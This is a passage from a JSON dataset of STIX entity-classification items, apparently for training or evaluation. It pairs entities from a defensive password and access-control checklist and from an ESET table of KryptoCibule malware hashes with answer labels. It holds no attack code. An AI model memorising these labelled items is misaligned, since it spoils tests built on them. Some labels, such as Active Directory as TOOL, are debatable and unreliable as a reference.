\"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nStore passwords in hashed format using industry-recognized password managers\n\n---\n\n### Text Passage:\n**Identity and Access Management**\n* **Require all accounts** with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with National Institute of Standards and Technology (NIST) standards for developing and managing password policies.\n* Use longer passwords consisting of at least 8 characters and no more than 64 characters in length.\n* Store passwords in hashed format using industry-recognized password managers.\n* Add password user \u201csalts\u201d to shared login credentials.\n* Avoid reusing passwords.\n* Implement multiple failed login attempt account lockouts.\n* Disable password \u201chints.\u201d\n* Refrain from requiring password changes more frequently than once per year unless a password is known or suspected to be compromised.\nNote: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password \u201cpatterns\u201d cyber criminals can easily decipher.\n* Require administrator credentials to install software.\n* **Require phishing-resistant multifactor authentication** for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.\n* **Review domain controllers, servers, workstations, and active directories** for new and/or unrecognized accounts.\n* **Audit user accounts** with administrative privileges and configure access controls according to the principle of least privilege.\n* **Implement time-based access for accounts set at the admin level and higher**. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.\n",
"output": "COURSE_OF_ACTION"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nNIST\n\n---\n\n### Text Passage:\n**Identity and Access Management**\n* **Require all accounts** with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with National Institute of Standards and Technology (NIST) standards for developing and managing password policies.\n* Use longer passwords consisting of at least 8 characters and no more than 64 characters in length.\n* Store passwords in hashed format using industry-recognized password managers.\n* Add password user \u201csalts\u201d to shared login credentials.\n* Avoid reusing passwords.\n* Implement multiple failed login attempt account lockouts.\n* Disable password \u201chints.\u201d\n* Refrain from requiring password changes more frequently than once per year unless a password is known or suspected to be compromised.\nNote: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password \u201cpatterns\u201d cyber criminals can easily decipher.\n* Require administrator credentials to install software.\n* **Require phishing-resistant multifactor authentication** for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.\n* **Review domain controllers, servers, workstations, and active directories** for new and/or unrecognized accounts.\n* **Audit user accounts** with administrative privileges and configure access controls according to the principle of least privilege.\n* **Implement time-based access for accounts set at the admin level and higher**. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nUse longer passwords consisting of at least 8 characters and no more than 64 characters in length\n\n---\n\n### Text Passage:\n**Identity and Access Management**\n* **Require all accounts** with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with National Institute of Standards and Technology (NIST) standards for developing and managing password policies.\n* Use longer passwords consisting of at least 8 characters and no more than 64 characters in length.\n* Store passwords in hashed format using industry-recognized password managers.\n* Add password user \u201csalts\u201d to shared login credentials.\n* Avoid reusing passwords.\n* Implement multiple failed login attempt account lockouts.\n* Disable password \u201chints.\u201d\n* Refrain from requiring password changes more frequently than once per year unless a password is known or suspected to be compromised.\nNote: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password \u201cpatterns\u201d cyber criminals can easily decipher.\n* Require administrator credentials to install software.\n* **Require phishing-resistant multifactor authentication** for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.\n* **Review domain controllers, servers, workstations, and active directories** for new and/or unrecognized accounts.\n* **Audit user accounts** with administrative privileges and configure access controls according to the principle of least privilege.\n* **Implement time-based access for accounts set at the admin level and higher**. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.\n",
"output": "COURSE_OF_ACTION"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nActive Directory\n\n---\n\n### Text Passage:\n**Identity and Access Management**\n* **Require all accounts** with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with National Institute of Standards and Technology (NIST) standards for developing and managing password policies.\n* Use longer passwords consisting of at least 8 characters and no more than 64 characters in length.\n* Store passwords in hashed format using industry-recognized password managers.\n* Add password user \u201csalts\u201d to shared login credentials.\n* Avoid reusing passwords.\n* Implement multiple failed login attempt account lockouts.\n* Disable password \u201chints.\u201d\n* Refrain from requiring password changes more frequently than once per year unless a password is known or suspected to be compromised.\nNote: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password \u201cpatterns\u201d cyber criminals can easily decipher.\n* Require administrator credentials to install software.\n* **Require phishing-resistant multifactor authentication** for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.\n* **Review domain controllers, servers, workstations, and active directories** for new and/or unrecognized accounts.\n* **Audit user accounts** with administrative privileges and configure access controls according to the principle of least privilege.\n* **Implement time-based access for accounts set at the admin level and higher**. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.\n",
"output": "TOOL"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nRequire administrator credentials to install software\n\n---\n\n### Text Passage:\n**Identity and Access Management**\n* **Require all accounts** with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with National Institute of Standards and Technology (NIST) standards for developing and managing password policies.\n* Use longer passwords consisting of at least 8 characters and no more than 64 characters in length.\n* Store passwords in hashed format using industry-recognized password managers.\n* Add password user \u201csalts\u201d to shared login credentials.\n* Avoid reusing passwords.\n* Implement multiple failed login attempt account lockouts.\n* Disable password \u201chints.\u201d\n* Refrain from requiring password changes more frequently than once per year unless a password is known or suspected to be compromised.\nNote: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password \u201cpatterns\u201d cyber criminals can easily decipher.\n* Require administrator credentials to install software.\n* **Require phishing-resistant multifactor authentication** for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems.\n* **Review domain controllers, servers, workstations, and active directories** for new and/or unrecognized accounts.\n* **Audit user accounts** with administrative privileges and configure access controls according to the principle of least privilege.\n* **Implement time-based access for accounts set at the admin level and higher**. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.\n",
"output": "COURSE_OF_ACTION"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nKryptoCibule\n\n---\n\n### Text Passage:\nSamples\nSHA-1 Filename ESET detection name\n---------\n3BCEF852639F85803974943FC34EFF2D6D7D916D armsvc.exe MSIL/KryptoCibule.A\n352743EBE6A0638CC0614216AD000B6A43C4D46E SystemArchitectureTranslation.exe MSIL/KryptoCibule.A\n70480D5F4CB10DE42DD2C863DDF57102BE6FA9E0 Updater.exe MSIL/KryptoCibule.A\n2E568CDF9B28824FBA1D7C16D8D0BE1D73A3FEBA Setup.exe MSIL/KryptoCibule.A\n",
"output": "MALWARE"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nESET\n\n---\n\n### Text Passage:\nSamples\nSHA-1 Filename ESET detection name\n---------\n3BCEF852639F85803974943FC34EFF2D6D7D916D armsvc.exe MSIL/KryptoCibule.A\n352743EBE6A0638CC0614216AD000B6A43C4D46E SystemArchitectureTranslation.exe MSIL/KryptoCibule.A\n70480D5F4CB10DE42DD2C863DDF57102BE6FA9E0 Updater.exe MSIL/KryptoCibule.A\n2E568CDF9B28824FBA1D7C16D8D0BE1D73A3FEBA Setup.exe MSIL/KryptoCibule.A\n",
"output": "IDENTITY"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\narmsvc.exe\n\n---\n\n### Text Passage:\nSamples\nSHA-1 Filename ESET detection name\n---------\n3BCEF852639F85803974943FC34EFF2D6D7D916D armsvc.exe MSIL/KryptoCibule.A\n352743EBE6A0638CC0614216AD000B6A43C4D46E SystemArchitectureTranslation.exe MSIL/KryptoCibule.A\n70480D5F4CB10DE42DD2C863DDF57102BE6FA9E0 Updater.exe MSIL/KryptoCibule.A\n2E568CDF9B28824FBA1D7C16D8D0BE1D73A3FEBA Setup.exe MSIL/KryptoCibule.A\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nSystemArchitectureTranslation.exe\n\n---\n\n### Text Passage:\nSamples\nSHA-1 Filename ESET detection name\n---------\n3BCEF852639F85803974943FC34EFF2D6D7D916D armsvc.exe MSIL/KryptoCibule.A\n352743EBE6A0638CC0614216AD000B6A43C4D46E SystemArchitectureTranslation.exe MSIL/KryptoCibule.A\n70480D5F4CB10DE42DD2C863DDF57102BE6FA9E0 Updater.exe MSIL/KryptoCibule.A\n2E568CDF9B28824FBA1D7C16D8D0BE1D73A3FEBA Setup.exe MSIL/KryptoCibule.A\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\nUpdater.exe\n\n---\n\n### Text Passage:\nSamples\nSHA-1 Filename ESET detection name\n---------\n3BCEF852639F85803974943FC34EFF2D6D7D916D armsvc.exe MSIL/KryptoCibule.A\n352743EBE6A0638CC0614216AD000B6A43C4D46E SystemArchitectureTranslation.exe MSIL/KryptoCibule.A\n70480D5F4CB10DE42DD2C863DDF57102BE6FA9E0 Updater.exe MSIL/KryptoCibule.A\n2E568CDF9B28824FBA1D7C16D8D0BE1D73A3FEBA Setup.exe MSIL/KryptoCibule.A\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n70480D5F4CB10DE42DD2C863DDF57102BE6FA9E0\n\n---\n\n### Text Passage:\nSamples\nSHA-1 Filename ESET detection name\n---------\n3BCEF852639F85803974943FC34EFF2D6D7D916D armsvc.exe MSIL/KryptoCibule.A\n352743EBE6A0638CC0614216AD000B6A43C4D46E SystemArchitectureTranslation.exe MSIL/KryptoCibule.A\n70480D5F4CB10DE42DD2C863DDF57102BE6FA9E0 Updater.exe MSIL/KryptoCibule.A\n2E568CDF9B28824FBA1D7C16D8D0BE1D73A3FEBA Setup.exe MSIL/KryptoCibule.A\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
